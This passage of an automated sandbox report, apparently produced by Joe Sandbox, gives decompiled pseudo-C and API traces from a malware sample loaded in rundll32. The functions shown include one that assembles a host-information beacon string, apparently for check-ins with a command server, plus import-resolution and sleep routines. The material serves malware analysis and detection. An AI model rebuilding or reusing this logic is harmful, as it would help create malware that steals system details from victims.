                                          • HeapFree.KERNEL32(00000000,0408D00C,0408D00C,0408D00C,00000000,00000005,00000000,00000000,?,?,?,0408207E,?,0408D00C,?,?), ref: 04089396
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
                                          • String ID:
                                          • API String ID: 983081259-0
                                          • Opcode ID: bb87f4fc4cdaeadde4087e1a29b1639eea030c8c91fc362dacd133a5d6387711
                                          • Instruction ID: 33417547a8cfe0a83729ada9318ce68a6d97d075bfe30f0afd6e3cbf0dd2231d
                                          • Opcode Fuzzy Hash: bb87f4fc4cdaeadde4087e1a29b1639eea030c8c91fc362dacd133a5d6387711
                                          • Instruction Fuzzy Hash: 1D0149B1200205EAF7007EE6DF80BBA76A8DB4536CB00013EF8C4F61E0D664BD815260
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04081B13(void** __edi, intOrPtr _a4, unsigned int _a8, void* _a12) {
                                          				void* _t15;
                                          				void* _t21;
                                          				signed int _t23;
                                          				void* _t26;
                                          
                                          				if(_a4 != 0) {
                                          					_t15 = E04087BA9(_a4, _a8, _a12, __edi); // executed
                                          					_t26 = _t15;
                                          				} else {
                                          					_t26 = E040874B9(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
                                          					if(_t26 == 0) {
                                          						_t23 = _a8 >> 1;
                                          						if(_t23 == 0) {
                                          							_t26 = 2;
                                          							HeapFree( *0x408d238, 0, _a12);
                                          						} else {
                                          							_t21 = _a12;
                                          							 *((short*)(_t21 + _t23 * 2 - 2)) = 0;
                                          							 *__edi = _t21;
                                          						}
                                          					}
                                          				}
                                          				return _t26;
                                          			}








                                          APIs
                                          • HeapFree.KERNEL32(00000000,?,00000000,80000002,7519F710,?,?,7519F710,00000000,?,0408690C,?,004F0053,04C89388,00000000,?), ref: 04081B60
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 3c7405765f893635d929a008d998acb56e5ea7ba84c0e5a233f7c969dc32048b
                                          • Instruction ID: c4b5cef82fcf9ea41143339bffef8f3b8d7dff99b6313ed7652aaa2ac694414b
                                          • Opcode Fuzzy Hash: 3c7405765f893635d929a008d998acb56e5ea7ba84c0e5a233f7c969dc32048b
                                          • Instruction Fuzzy Hash: 84016731100119FBDB21AF94DD01FDA77A5EF94360F04842DFA59AE160E730D921D790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 88%
                                          			E0408A872(intOrPtr* __edi) {
                                          				intOrPtr _v8;
                                          				char _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _t15;
                                          				intOrPtr* _t21;
                                          
                                          				_t21 = __edi;
                                          				_push( &_v12);
                                          				_push(__edi);
                                          				_v8 = 0x1d4c0;
                                          				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
                                          				while(1) {
                                          					_v16 = _t15;
                                          					Sleep(0x1f4); // executed
                                          					if(_v12 == 4) {
                                          						break;
                                          					}
                                          					if(_v8 == 0) {
                                          						L4:
                                          						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
                                          						continue;
                                          					} else {
                                          						if(_v8 <= 0x1f4) {
                                          							_v16 = 0x80004004;
                                          						} else {
                                          							_v8 = _v8 - 0x1f4;
                                          							goto L4;
                                          						}
                                          					}
                                          					L8:
                                          					return _v16;
                                          				}
                                          				goto L8;
                                          			}









                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: d7ba2fd8a83599ea036ad9519f0ee406c8ca98ac9a6a135efef5f5d2a33ab040
                                          • Instruction ID: 6257db1876fd44a2452ed62a94f26aec27580d541b7d3e25c4357103397f648b
                                          • Opcode Fuzzy Hash: d7ba2fd8a83599ea036ad9519f0ee406c8ca98ac9a6a135efef5f5d2a33ab040
                                          • Instruction Fuzzy Hash: 4FF01971E01218EFDB00EB94C688AEDB7B8EF04204F1080AFE942B7140D3B46B85CF62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E040860CF(void* __edx, void* __edi, void* _a4) {
                                          				int _t7;
                                          				int _t13;
                                          
                                          				_t7 = E04087A28(__edx, __edi, _a4,  &_a4); // executed
                                          				_t13 = _t7;
                                          				if(_t13 != 0) {
                                          					memcpy(__edi, _a4, _t13);
                                          					 *((char*)(__edi + _t13)) = 0;
                                          					E0408147E(_a4);
                                          				}
                                          				return _t13;
                                          			}






                                          APIs
                                            • Part of subcall function 04087A28: memcpy.NTDLL(00000000,00000090,?,?,?,00000008), ref: 04087A5E
                                            • Part of subcall function 04087A28: memset.NTDLL ref: 04087AD3
                                            • Part of subcall function 04087A28: memset.NTDLL ref: 04087AE7
                                          • memcpy.NTDLL(?,?,00000000,?,?,?,?,?,04089F9F,?,?,04089C62,00000002,?,?,?), ref: 040860EB
                                            • Part of subcall function 0408147E: HeapFree.KERNEL32(00000000,00000000,04081D11,00000000,?,?,-00000008), ref: 0408148A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: memcpymemset$FreeHeap
                                          • String ID:
                                          • API String ID: 3053036209-0
                                          • Opcode ID: f2b2b8ba8929acc20bdd7dadbc9947bfae244f1e76b9b7981e545fa298f64d36
                                          • Instruction ID: 20b601539e5fd55f239ef46cd0073cc2ac289aa58759536777b89a2a4ac83a60
                                          • Opcode Fuzzy Hash: f2b2b8ba8929acc20bdd7dadbc9947bfae244f1e76b9b7981e545fa298f64d36
                                          • Instruction Fuzzy Hash: 4AE08C7650012977DB223A94DC40DEF7F5C8F52699F004028FE88AA205EA26EA1097E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          C-Code - Quality: 66%
                                          			E0408514F(long __eax, void* __ecx, void* __edx, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
                                          				intOrPtr _v0;
                                          				intOrPtr _v4;
                                          				intOrPtr _v20;
                                          				intOrPtr _v28;
                                          				intOrPtr _v32;
                                          				void* _v48;
                                          				intOrPtr _v56;
                                          				void* __edi;
                                          				long _t26;
                                          				intOrPtr _t27;
                                          				intOrPtr _t28;
                                          				intOrPtr _t29;
                                          				intOrPtr _t30;
                                          				intOrPtr _t31;
                                          				void* _t34;
                                          				intOrPtr _t35;
                                          				int _t38;
                                          				intOrPtr _t43;
                                          				intOrPtr _t44;
                                          				intOrPtr _t51;
                                          				intOrPtr _t55;
                                          				intOrPtr* _t57;
                                          				intOrPtr _t63;
                                          				intOrPtr _t65;
                                          				intOrPtr _t71;
                                          				intOrPtr _t74;
                                          				intOrPtr _t77;
                                          				int _t80;
                                          				intOrPtr _t81;
                                          				int _t84;
                                          				intOrPtr _t86;
                                          				int _t89;
                                          				intOrPtr* _t92;
                                          				intOrPtr* _t93;
                                          				void* _t94;
                                          				void* _t98;
                                          				void* _t99;
                                          				void* _t100;
                                          				intOrPtr _t101;
                                          				void* _t103;
                                          				int _t104;
                                          				void* _t105;
                                          				void* _t106;
                                          				void* _t108;
                                          				void* _t109;
                                          				void* _t111;
                                          
                                          				_t98 = __edx;
                                          				_t94 = __ecx;
                                          				_t26 = __eax;
                                          				_t108 = _a16;
                                          				_v4 = 8;
                                          				if(__eax == 0) {
                                          					_t26 = GetTickCount();
                                          				}
                                          				_t27 =  *0x408d018; // 0x3df0b315
                                          				asm("bswap eax");
                                          				_t28 =  *0x408d014; // 0x3a87c8cd
                                          				asm("bswap eax");
                                          				_t29 =  *0x408d010; // 0xd8d2f808
                                          				asm("bswap eax");
                                          				_t30 =  *0x408d00c; // 0x8f8f86c2
                                          				asm("bswap eax");
                                          				_t31 =  *0x408d2a4; // 0xbfa5a8
                                          				_t3 = _t31 + 0x408e633; // 0x74666f73
                                          				_t104 = wsprintfA(_t108, _t3, 2, 0x3d137, _t30, _t29, _t28, _t27,  *0x408d02c,  *0x408d004, _t26);
                                          				_t34 = E040857AB();
                                          				_t35 =  *0x408d2a4; // 0xbfa5a8
                                          				_t4 = _t35 + 0x408e673; // 0x74707526
                                          				_t38 = wsprintfA(_t104 + _t108, _t4, _t34);
                                          				_t111 = _t109 + 0x38;
                                          				_t105 = _t104 + _t38;
                                          				_t99 = E040873E9(_t94);
                                          				if(_t99 != 0) {
                                          					_t86 =  *0x408d2a4; // 0xbfa5a8
                                          					_t6 = _t86 + 0x408e8cb; // 0x736e6426
                                          					_t89 = wsprintfA(_t105 + _t108, _t6, _t99);
                                          					_t111 = _t111 + 0xc;
                                          					_t105 = _t105 + _t89;
                                          					HeapFree( *0x408d238, 0, _t99);
                                          				}
                                          				_t100 = E0408614A();
                                          				if(_t100 != 0) {
                                          					_t81 =  *0x408d2a4; // 0xbfa5a8
                                          					_t8 = _t81 + 0x408e8d3; // 0x6f687726
                                          					_t84 = wsprintfA(_t105 + _t108, _t8, _t100);
                                          					_t111 = _t111 + 0xc;
                                          					_t105 = _t105 + _t84;
                                          					HeapFree( *0x408d238, 0, _t100);
                                          				}
                                          				_t101 =  *0x408d324; // 0x4c895b0
                                          				_a32 = E0408757B(0x408d00a, _t101 + 4);
                                          				_t43 =  *0x408d2cc; // 0x0
                                          				if(_t43 != 0) {
                                          					_t77 =  *0x408d2a4; // 0xbfa5a8
                                          					_t11 = _t77 + 0x408e8ad; // 0x3d736f26
                                          					_t80 = wsprintfA(_t105 + _t108, _t11, _t43);
                                          					_t111 = _t111 + 0xc;
                                          					_t105 = _t105 + _t80;
                                          				}
                                          				_t44 =  *0x408d2c8; // 0x0
                                          				if(_t44 != 0) {
                                          					_t74 =  *0x408d2a4; // 0xbfa5a8
                                          					_t13 = _t74 + 0x408e8a6; // 0x3d706926
                                          					wsprintfA(_t105 + _t108, _t13, _t44);
                                          				}
                                          				if(_a32 != 0) {
                                          					_t103 = RtlAllocateHeap( *0x408d238, 0, 0x800);
                                          					if(_t103 != 0) {
                                          						E0408749F(GetTickCount());
                                          						_t51 =  *0x408d324; // 0x4c895b0
                                          						__imp__(_t51 + 0x40);
                                          						asm("lock xadd [eax], ecx");
                                          						_t55 =  *0x408d324; // 0x4c895b0
                                          						__imp__(_t55 + 0x40);
                                          						_t57 =  *0x408d324; // 0x4c895b0
                                          						_t106 = E04084D2C(1, _t98, _t108,  *_t57);
                                          						asm("lock xadd [eax], ecx");
                                          						if(_t106 != 0) {
                                          							StrTrimA(_t106, 0x408c294);
                                          							_t63 =  *0x408d2a4; // 0xbfa5a8
                                          							_push(_t106);
                                          							_t15 = _t63 + 0x408e252; // 0x616d692f
                                          							_t65 = E04089DEF(_t15);
                                          							_v20 = _t65;
                                          							if(_t65 != 0) {
                                          								_t92 = __imp__;
                                          								 *_t92(_t106, _v4);
                                          								 *_t92(_t103, _v0);
                                          								_t93 = __imp__;
                                          								 *_t93(_t103, _v32);
                                          								 *_t93(_t103, _t106);
                                          								_t71 = E0408666E(0xffffffffffffffff, _t103, _v32, _v28);
                                          								_v56 = _t71;
                                          								if(_t71 != 0 && _t71 != 0x10d2) {
                                          									E04086106();
                                          								}
                                          								HeapFree( *0x408d238, 0, _v48);
                                          							}
                                          							HeapFree( *0x408d238, 0, _t106);
                                          						}
                                          						HeapFree( *0x408d238, 0, _t103);
                                          					}
                                          					HeapFree( *0x408d238, 0, _a24);
                                          				}
                                          				HeapFree( *0x408d238, 0, _t108);
                                          				return _a12;
                                          			}

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 04085166
                                          • wsprintfA.USER32 ref: 040851B3
                                          • wsprintfA.USER32 ref: 040851D0
                                          • wsprintfA.USER32 ref: 040851F3
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04085203
                                          • wsprintfA.USER32 ref: 04085225
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04085235
                                          • wsprintfA.USER32 ref: 0408526C
                                          • wsprintfA.USER32 ref: 0408528C
                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 040852A9
                                          • GetTickCount.KERNEL32 ref: 040852B9
                                          • RtlEnterCriticalSection.NTDLL(04C89570), ref: 040852CD
                                          • RtlLeaveCriticalSection.NTDLL(04C89570), ref: 040852EB
                                            • Part of subcall function 04084D2C: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,040852FE,?,04C895B0), ref: 04084D57
                                            • Part of subcall function 04084D2C: lstrlen.KERNEL32(?,?,?,040852FE,?,04C895B0), ref: 04084D5F
                                            • Part of subcall function 04084D2C: strcpy.NTDLL ref: 04084D76
                                            • Part of subcall function 04084D2C: lstrcat.KERNEL32(00000000,?), ref: 04084D81
                                            • Part of subcall function 04084D2C: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,040852FE,?,04C895B0), ref: 04084D9E
                                          • StrTrimA.SHLWAPI(00000000,0408C294,?,04C895B0), ref: 0408531D
                                            • Part of subcall function 04089DEF: lstrlen.KERNEL32(?,00000000,00000000,04085335,616D692F,00000000), ref: 04089DFB
                                            • Part of subcall function 04089DEF: lstrlen.KERNEL32(?), ref: 04089E03
                                            • Part of subcall function 04089DEF: lstrcpy.KERNEL32(00000000,?), ref: 04089E1A
                                            • Part of subcall function 04089DEF: lstrcat.KERNEL32(00000000,?), ref: 04089E25
                                          • lstrcpy.KERNEL32(00000000,?), ref: 04085348
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0408534F
                                          • lstrcat.KERNEL32(00000000,?), ref: 0408535C
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 04085360
                                            • Part of subcall function 0408666E: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,751881D0), ref: 04086720
                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04085390
                                          • HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 0408539F
                                          • HeapFree.KERNEL32(00000000,00000000,?,04C895B0), ref: 040853AE
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 040853C0
                                          • HeapFree.KERNEL32(00000000,?), ref: 040853CF
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                          • String ID:
                                          • API String ID: 3080378247-0
                                          • Opcode ID: 11402061ce7d70dcf66e8aa3cd6e08482f4c1d3d2458f51b3beea0a4c60d1078
                                          • Instruction ID: 98065eb611fd81518863563ca080b0d4d091bb7c58c21af3e2af3b82ea4f27bd
                                          • Opcode Fuzzy Hash: 11402061ce7d70dcf66e8aa3cd6e08482f4c1d3d2458f51b3beea0a4c60d1078
                                          • Instruction Fuzzy Hash: 95616C71500205AFE711AF64EE48F5A7BE8EF48354B05063CF988FB290DB2DED059B65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 51%
                                          			E0408ADA5(long _a4, long _a8) {
                                          				signed int _v8;
                                          				intOrPtr _v16;
                                          				LONG* _v28;
                                          				long _v40;
                                          				long _v44;
                                          				long _v48;
                                          				CHAR* _v52;
                                          				long _v56;
                                          				CHAR* _v60;
                                          				long _v64;
                                          				signed int* _v68;
                                          				char _v72;
                                          				signed int _t76;
                                          				signed int _t80;
                                          				signed int _t81;
                                          				intOrPtr* _t82;
                                          				intOrPtr* _t83;
                                          				intOrPtr* _t85;
                                          				intOrPtr* _t90;
                                          				intOrPtr* _t95;
                                          				intOrPtr* _t98;
                                          				void* _t102;
                                          				intOrPtr* _t104;
                                          				void* _t115;
                                          				long _t116;
                                          				void _t125;
                                          				void* _t131;
                                          				signed short _t133;
                                          				struct HINSTANCE__* _t138;
                                          				signed int* _t139;
                                          
                                          				_t139 = _a4;
                                          				_v28 = _t139[2] + 0x4080000;
                                          				_t115 = _t139[3] + 0x4080000;
                                          				_t131 = _t139[4] + 0x4080000;
                                          				_v8 = _t139[7];
                                          				_v60 = _t139[1] + 0x4080000;
                                          				_v16 = _t139[5] + 0x4080000;
                                          				_v64 = _a8;
                                          				_v72 = 0x24;
                                          				_v68 = _t139;
                                          				_v56 = 0;
                                          				asm("stosd");
                                          				_v48 = 0;
                                          				_v44 = 0;
                                          				_v40 = 0;
                                          				if(( *_t139 & 0x00000001) == 0) {
                                          					_a8 =  &_v72;
                                          					RaiseException(0xc06d0057, 0, 1,  &_a8);
                                          					return 0;
                                          				}
                                          				_t138 =  *_v28;
                                          				_t76 = _a8 - _t115 >> 2 << 2;
                                          				_t133 =  *(_t131 + _t76);
                                          				_a4 = _t76;
                                          				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                                          				_v56 = _t80;
                                          				_t81 = _t133 + 0x4080002;
                                          				if(_t80 == 0) {
                                          					_t81 = _t133 & 0x0000ffff;
                                          				}
                                          				_v52 = _t81;
                                          				_t82 =  *0x408d1a0; // 0x0
                                          				_t116 = 0;
                                          				if(_t82 == 0) {
                                          					L6:
                                          					if(_t138 != 0) {
                                          						L18:
                                          						_t83 =  *0x408d1a0; // 0x0
                                          						_v48 = _t138;
                                          						if(_t83 != 0) {
                                          							_t116 =  *_t83(2,  &_v72);
                                          						}
                                          						if(_t116 != 0) {
                                          							L32:
                                          							 *_a8 = _t116;
                                          							L33:
                                          							_t85 =  *0x408d1a0; // 0x0
                                          							if(_t85 != 0) {
                                          								_v40 = _v40 & 0x00000000;
                                          								_v48 = _t138;
                                          								_v44 = _t116;
                                          								 *_t85(5,  &_v72);
                                          							}
                                          							return _t116;
                                          						} else {
                                          							if(_t139[5] == _t116 || _t139[7] == _t116) {
                                          								L27:
                                          								_t116 = GetProcAddress(_t138, _v52);
                                          								if(_t116 == 0) {
                                          									_v40 = GetLastError();
                                          									_t90 =  *0x408d19c; // 0x0
                                          									if(_t90 != 0) {
                                          										_t116 =  *_t90(4,  &_v72);
                                          									}
                                          									if(_t116 == 0) {
                                          										_a4 =  &_v72;
                                          										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                                          										_t116 = _v44;
                                          									}
                                          								}
                                          								goto L32;
                                          							} else {
                                          								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                                          								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                                          									_t116 =  *(_a4 + _v16);
                                          									if(_t116 != 0) {
                                          										goto L32;
                                          									}
                                          								}
                                          								goto L27;
                                          							}
                                          						}
                                          					}
                                          					_t98 =  *0x408d1a0; // 0x0
                                          					if(_t98 == 0) {
                                          						L9:
                                          						_t138 = LoadLibraryA(_v60);
                                          						if(_t138 != 0) {
                                          							L13:
                                          							if(InterlockedExchange(_v28, _t138) == _t138) {
                                          								FreeLibrary(_t138);
                                          							} else {
                                          								if(_t139[6] != 0) {
                                          									_t102 = LocalAlloc(0x40, 8);
                                          									if(_t102 != 0) {
                                          										 *(_t102 + 4) = _t139;
                                          										_t125 =  *0x408d198; // 0x0
                                          										 *_t102 = _t125;
                                          										 *0x408d198 = _t102;
                                          									}
                                          								}
                                          							}
                                          							goto L18;
                                          						}
                                          						_v40 = GetLastError();
                                          						_t104 =  *0x408d19c; // 0x0
                                          						if(_t104 == 0) {
                                          							L12:
                                          							_a8 =  &_v72;
                                          							RaiseException(0xc06d007e, 0, 1,  &_a8);
                                          							return _v44;
                                          						}
                                          						_t138 =  *_t104(3,  &_v72);
                                          						if(_t138 != 0) {
                                          							goto L13;
                                          						}
                                          						goto L12;
                                          					}
                                          					_t138 =  *_t98(1,  &_v72);
                                          					if(_t138 != 0) {
                                          						goto L13;
                                          					}
                                          					goto L9;
                                          				}
                                          				_t116 =  *_t82(0,  &_v72);
                                          				if(_t116 != 0) {
                                          					goto L33;
                                          				}
                                          				goto L6;
                                          			}

                                          APIs
                                          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0408AE1E
                                          • LoadLibraryA.KERNEL32(?), ref: 0408AE9B
                                          • GetLastError.KERNEL32 ref: 0408AEA7
                                          • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 0408AEDA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                          • String ID: $
                                          • API String ID: 948315288-3993045852
                                          • Opcode ID: 0989531e314af3d7f22b7e69136096ceb6354b87cc0d6be32bb3dcd1f6120e93
                                          • Instruction ID: 0db36dc1ac8af70b3935f7cf4d02c3a136fe2297bb600838dc3ac8b66f189b4d
                                          • Opcode Fuzzy Hash: 0989531e314af3d7f22b7e69136096ceb6354b87cc0d6be32bb3dcd1f6120e93
                                          • Instruction Fuzzy Hash: EF8128B1A00605AFDB51DF98DA80BAEB7F5EF48310F14812EE985E7641E774E905CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 56%
                                          			E040830FC(void* __ecx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				char _v16;
                                          				signed int _v20;
                                          				void* __esi;
                                          				intOrPtr _t42;
                                          				intOrPtr _t44;
                                          				void* _t46;
                                          				void* _t47;
                                          				void* _t48;
                                          				int _t49;
                                          				intOrPtr _t53;
                                          				WCHAR* _t56;
                                          				void* _t57;
                                          				int _t58;
                                          				intOrPtr _t64;
                                          				void* _t69;
                                          				intOrPtr* _t73;
                                          				void* _t74;
                                          				intOrPtr _t75;
                                          				intOrPtr _t79;
                                          				intOrPtr* _t85;
                                          				intOrPtr _t88;
                                          
                                          				_t74 = __ecx;
                                          				_t79 =  *0x408d33c; // 0x4c89bb0
                                          				_v20 = 8;
                                          				_v16 = GetTickCount();
                                          				_t42 = E04089810(_t74,  &_v16);
                                          				_v12 = _t42;
                                          				if(_t42 == 0) {
                                          					_v12 = 0x408c19c;
                                          				}
                                          				_t44 = E040847E1(_t79);
                                          				_v8 = _t44;
                                          				if(_t44 != 0) {
                                          					_t85 = __imp__;
                                          					_t46 =  *_t85(_v12, _t69);
                                          					_t47 =  *_t85(_v8);
                                          					_t48 =  *_t85(_a4);
                                          					_t49 = lstrlenW(_a8);
                                          					_t53 = E040858BE(lstrlenW(0x408eb38) + _t48 + _t46 + _t46 + _t47 + _t49 + lstrlenW(0x408eb38) + _t48 + _t46 + _t46 + _t47 + _t49 + 2);
                                          					_v16 = _t53;
                                          					if(_t53 != 0) {
                                          						_t75 =  *0x408d2a4; // 0xbfa5a8
                                          						_t73 =  *0x408d11c; // 0x408abc9
                                          						_t18 = _t75 + 0x408eb38; // 0x530025
                                          						 *_t73(_t53, _t18, _v12, _v12, _a4, _v8, _a8);
                                          						_t56 =  *_t85(_v8);
                                          						_a8 = _t56;
                                          						_t57 =  *_t85(_a4);
                                          						_t58 = lstrlenW(_a12);
                                          						_t88 = E040858BE(lstrlenW(0x408ec58) + _a8 + _t57 + _t58 + lstrlenW(0x408ec58) + _a8 + _t57 + _t58 + 2);
                                          						if(_t88 == 0) {
                                          							E0408147E(_v16);
                                          						} else {
                                          							_t64 =  *0x408d2a4; // 0xbfa5a8
                                          							_t31 = _t64 + 0x408ec58; // 0x73006d
                                          							 *_t73(_t88, _t31, _a4, _v8, _a12);
                                          							 *_a16 = _v16;
                                          							_v20 = _v20 & 0x00000000;
                                          							 *_a20 = _t88;
                                          						}
                                          					}
                                          					E0408147E(_v8);
                                          				}
                                          				return _v20;
                                          			}

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 04083111
                                          • lstrlen.KERNEL32(00000000,80000002), ref: 0408314C
                                          • lstrlen.KERNEL32(?), ref: 04083155
                                          • lstrlen.KERNEL32(00000000), ref: 0408315C
                                          • lstrlenW.KERNEL32(80000002), ref: 0408316A
                                          • lstrlenW.KERNEL32(0408EB38), ref: 04083173
                                          • lstrlen.KERNEL32(?), ref: 040831B7
                                          • lstrlen.KERNEL32(?), ref: 040831BF
                                          • lstrlenW.KERNEL32(?), ref: 040831CA
                                          • lstrlenW.KERNEL32(0408EC58), ref: 040831D3
                                            • Part of subcall function 0408147E: HeapFree.KERNEL32(00000000,00000000,04081D11,00000000,?,?,-00000008), ref: 0408148A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$CountFreeHeapTick
                                          • String ID:
                                          • API String ID: 2535036572-0
                                          • Opcode ID: 3d20a6abbd3e08312fb70f2689d6bae969a0ac2189d19fb70aa0fdadd4fd7917
                                          • Instruction ID: 194f336cbd4a6932f556330393831bf09120db0e0232eb11393fe61e5cab3eb6
                                          • Opcode Fuzzy Hash: 3d20a6abbd3e08312fb70f2689d6bae969a0ac2189d19fb70aa0fdadd4fd7917
                                          • Instruction Fuzzy Hash: 73313772D0021AEBDF01AFA4CE449DEBBB5EF44358B158069E944BB211DB39EA11DF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E005115C2(intOrPtr* _a4, intOrPtr _a8) {
                                          				signed int _v8;
                                          				signed short _v12;
                                          				struct HINSTANCE__* _v16;
                                          				intOrPtr _v20;
                                          				_Unknown_base(*)()* _v24;
                                          				intOrPtr _t34;
                                          				intOrPtr _t36;
                                          				struct HINSTANCE__* _t37;
                                          				intOrPtr _t40;
                                          				CHAR* _t44;
                                          				_Unknown_base(*)()* _t45;
                                          				intOrPtr* _t52;
                                          				intOrPtr _t53;
                                          				signed short _t54;
                                          				intOrPtr* _t57;
                                          				signed short _t59;
                                          				CHAR* _t60;
                                          				CHAR* _t62;
                                          				signed short* _t64;
                                          				void* _t65;
                                          				signed short _t72;
                                          
                                          				_t34 =  *((intOrPtr*)(_a8 + 0x80));
                                          				_v8 = _v8 & 0x00000000;
                                          				_t52 = _a4;
                                          				if(_t34 == 0) {
                                          					L28:
                                          					return _v8;
                                          				}
                                          				_t57 = _t34 + _t52;
